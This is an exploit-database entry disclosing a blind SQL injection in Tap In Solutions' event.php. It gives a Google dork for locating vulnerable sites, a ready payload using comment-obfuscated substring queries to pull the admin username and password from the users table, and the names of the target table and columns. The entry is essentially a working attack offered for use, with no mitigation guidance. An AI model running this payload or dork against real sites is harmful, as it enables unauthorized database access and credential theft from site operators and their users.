Tap In Solutions Blind SQL Injection Vulnerability



EKU-ID: 1153 CVE: OSVDB-ID:
Author: poach3r Published: 2011-10-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


==========================================================================

# Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability
# Date: 17.10.2011
# Author: poach3r
# Software Link: http://www.tapinsolutionsinc.com/
# Tested on: Windows XP SP3
# Google Dork: inurl:event.php?event_id= powered by Tap In Solutions

==========================================================================

# Vulnerable File : 

==> event.php <==

# Exploit :

http://127.0.0.1/path/event.php?event_id=[SQL]

# Demo :

http://127.0.0.1/path/event.php?event_id=1/**/and/**/(select/**/substring(concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1

# Details :

Admin Table : users
Username Column : user_name
Password Column : password

==========================================================================
# GreetZ To : All IRANIAN HackerZ

./End